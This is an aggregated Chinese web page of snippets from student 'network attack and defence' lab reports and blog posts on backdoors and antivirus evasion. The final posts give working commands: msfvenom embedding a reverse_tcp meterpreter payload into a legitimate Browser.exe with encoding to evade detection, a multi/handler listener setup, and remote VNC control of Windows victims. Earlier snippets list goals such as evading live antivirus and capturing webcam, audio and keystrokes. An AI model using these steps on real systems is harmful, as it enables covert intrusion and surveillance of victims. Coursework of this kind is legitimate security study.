后门程序

2019-2020-2 20175320 《网络对抗技术》Exp3 后门原理与实践

江枫思渺然 提交于 2020-03-27 19:16:53
2019-2020-2 20175320 《网络对抗技术》Exp3 后门原理与实践 一、实验要求 了解metasploit、veil、加壳工具的使用方法,并利用以上软件实现后门程序与杀软之间的共存,并利用后门程序获取被攻击方的shell。 二、实验目标 1、正确使用msf编码器 2、msfvenom生成如jar之类的其他文件 3、使用veil进行免杀处理 4、使用upx加压缩壳,hyperion加加密壳 5、使用C + shellcode编程进行免杀 6、使用python + shellcode进行免杀(使用其他课堂未介绍方法) 7、通过组合应用各种技术实现恶意代码免杀 8、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 三、实验过程 1.准备工作 (1)安装veil 用 sudo apt-get install veil 命令安装veil,如果有问题可以尝试使用 sudo apt-get update 和 sudo apt-get upgrade 命令更新一下软件包。 安装完成后使用 veil 命令打开veil,输入Y继续安装直到完成。期间可能会因为网络问题下载中断,并且需要手动确认部分软件的安装,这一准备工作需要较长的时间。 (2)hyperion加密壳应用 由于我的kali系统里没有hyperion的文件夹

2019-2020-2 网络对抗技术 20175318 Exp3 免杀原理与实践

孤街浪徒 提交于 2020-03-27 12:18:51
一、免杀原理及基础问题回答 1.免杀原理 2.基础问题回答 3.免杀效果评价 二、实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 使用msf编码器生成各种后门程序及检测 使用veil-evasion生成后门程序及检测 半手工注入Shellcode并执行 使用其他课程未介绍的方法 任务二:通过组合应用各种技术实现恶意代码免杀 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 三、开启杀软能绝对防止电脑中恶意代码吗? 四、实验总结与体会 一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出现的一段或多段代码,而且是其他正常程序没有的,即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。

2019-2020-2 20175320 《网络对抗技术》Exp2 后门原理与实践

余生颓废 提交于 2020-03-12 09:39:09
2019-2020-2 20175320 《网络对抗技术》Exp2 后门原理与实践 一、实验要求 了解nc、meterpreter以及metaspolit的使用方法,并利用以上软件实现以下操作: 1、攻击方获取被攻击方shell。 2、通过对正常软件植入后门程序,实现被攻击者运行带后门的软件时攻击者可以渗透被攻击方的系统。 3、对window以及linux进行设置,使得后门程序能在后台运行。 二、实验目标 1、使用netcat获取主机操作Shell,cron启动。 2、使用socat获取主机操作Shell, 任务计划启动。 3、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。 4、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。 三、实验过程 1.准备工作 (1)准备好windows以及linux两个虚拟机,并查看两者的ip地址。 (2)关闭windows的防火墙以及杀毒软件。 (3)两边都使用ping命令测试一下连通性。 需要注意的是,我在实验中遇到了linux无法ping通windows但windows可以ping通linux的情况。而这一问题在重新打开并关闭windows防火墙后得到了解决

msf生成windows后门程序

扶醉桌前 提交于 2020-02-05 01:28:01
进入文件夹,我们先要把我们需要制作后门程序的正常exe文件拖进去 在此处打开终端,确保该路径存在这个exe文件! 输入命令 msfvenom -a x86 --platform widows -p windows/meterpreter/reverse_tcp LHOST=192.168.132.133 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -x Browser.exe -f exe -o /root/project/Browser.exe -a:用于指定架构 –platform用于指定平台 -p用于指定payload LHOST处填写自己kali的地址 LPORT指定端口 -b指去除坏字符 -e是指定编码器 -i是加码 -x是指定本目录下我们的无毒原文件 -f指定输出格式 -o指定导出路径以及文件名称 在指定路径下就可以看到我们生成的文件 然后把该文件扔给window7但先不运行 回到kali打开msfconsole 设置启用handler模块,设置ip等一系列操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.53 set LPORT 4444 exploit 7.

利用后门程序远程攻击win7/win8/win10

匿名 (未验证) 提交于 2019-12-03 00:43:02
msfvenom -p windows/meterpreter/reverse_tcp LHOST = 192.168.0.106 LPORT=4444 exe > /root/Desktop/WindowsPatch.exe msfconsole use multi/handler 4. 璁剧疆payload set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168 . 0.41 set LPORT 4444 run 获取系统信息 sysinfo 利用vnc对靶机进行图形化远程控制 run vnc 文章来源: 利用后门程序远程攻击win7/win8/win10